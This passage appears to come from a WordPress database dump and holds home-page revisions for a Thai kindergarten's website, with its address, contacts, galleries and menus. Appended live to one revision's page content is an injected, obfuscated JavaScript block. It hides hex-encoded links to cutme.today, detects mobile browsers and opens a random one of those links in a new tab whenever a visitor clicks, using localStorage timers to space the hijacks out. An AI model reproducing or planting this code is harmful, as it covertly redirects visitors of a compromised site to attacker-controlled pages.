src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-27 21:21:55','2024-07-27 14:21:55','',19,'http://watprato.ssk.in.th/?p=69',0,'revision','',0),
(73,1,'2024-07-27 21:24:52','2024-07-27 14:24:52','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"bcb37a0b\",\"mediaId\":40,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-bcb37a0b\"><img class=\"gb-image gb-image-bcb37a0b\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/434878811_122134783502202781_1764078122862278595_n.jpg\" alt=\"\" title=\"434878811_122134783502202781_1764078122862278595_n\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline 